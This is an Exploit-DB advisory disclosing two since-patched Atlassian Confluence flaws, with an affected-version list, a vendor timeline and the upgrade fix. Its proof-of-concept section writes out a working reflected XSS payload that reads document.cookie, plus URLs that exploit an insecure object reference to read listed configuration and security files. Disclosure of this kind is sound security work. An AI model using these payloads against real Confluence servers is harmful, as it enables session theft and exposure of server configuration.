Atlassian Confluence 5.2/5.8.14/5.8.15 - Multiple Vulnerabilities

EDB-ID:

39170




Platform:

XML

Date:

2016-01-05


[Systems Affected]
    Product              :    Confluence
    Company            :    Atlassian
    Versions (1)        :    5.2 / 5.8.14 / 5.8.15
    CVSS Score (1)  :    6.1 / Medium (classified by vendor)
    Versions (2)        :    5.9.1 / 5.8.14 / 5.8.15
    CVSS Score (2)  :    7.7 / High (classified by vendor)


[Product Description]
    Confluence is team collaboration software, where you create,
organize and discuss work with your team. it is developed and marketed
by Atlassian.


[Vulnerabilities]
    Two vulnerabilities were identified within this application:
    (1) Reflected Cross-Site Scripting (CVE-2015-8398)
    (2) Insecure Direct Object Reference (CVE-2015-8399)


[Advisory Timeline]
    26/Oct/2015 - Discovery and vendor notification
    26/Oct/2015 - Vendor replied for Cross-Site Scripting (SEC-490)
    26/Oct/2015 - Issue CONF-39689 created
    27/Oct/2015 - Vendor replied for Insecure Direct Object Reference
(SEC-491 / SEC-492)
    27/Oct/2015 - Issue CONF-39704 created
    16/Nov/2015 - Vendor confirmed that Cross-Site Scripting was fixed
    19/Nov/2015 - Vendor confirmed that Insecure Direct Object
Reference was fixed


[Patch Available]
    According to the vendor, upgrade to Confluence version 5.8.17


[Description of Vulnerabilities]
    (1) Reflected Cross-Site Scripting
        An unauthenticated reflected Cross-site scripting was found in
the REST API. The vulnerability is located at
/rest/prototype/1/session/check/ and the payload used is <img src=a
onerror=alert(document.cookie)>

        [References]
            CVE-2015-8398 / SEC-490 / CONF-39689

        [PoC]
            http://<Confluence
Server>/rest/prototype/1/session/check/something%3Cimg%20src%3da%20onerror%3dalert%28document.cookie%29%3E


    (2) Insecure Direct Object Reference
        Two instances of Insecure Direct Object Reference were found
within the application, that allows any authenticated user to read
configuration files from the application

        [References]
            CVE-2015-8399 / SEC-491 / SEC-492 / CONF-39704

        [PoC]
            http://<Confluence
Server>/spaces/viewdefaultdecorator.action?decoratorName=<FILE>
            http://<Confluence
Server>/admin/viewdefaultdecorator.action?decoratorName=<FILE>

            This is an example of accepted <FILE> parameters
            /WEB-INF/decorators.xml
            /WEB-INF/glue-config.xml
            /WEB-INF/server-config.wsdd
            /WEB-INF/sitemesh.xml
            /WEB-INF/urlrewrite.xml
            /WEB-INF/web.xml
            /databaseSubsystemContext.xml
            /securityContext.xml
            /services/statusServiceContext.xml
            com/atlassian/confluence/security/SpacePermission.hbm.xml
            com/atlassian/confluence/user/OSUUser.hbm.xml
            com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
            com/atlassian/confluence/user/ConfluenceUser.hbm.xml

-- 
S3ba
@s3bap3
linkedin.com/in/s3bap3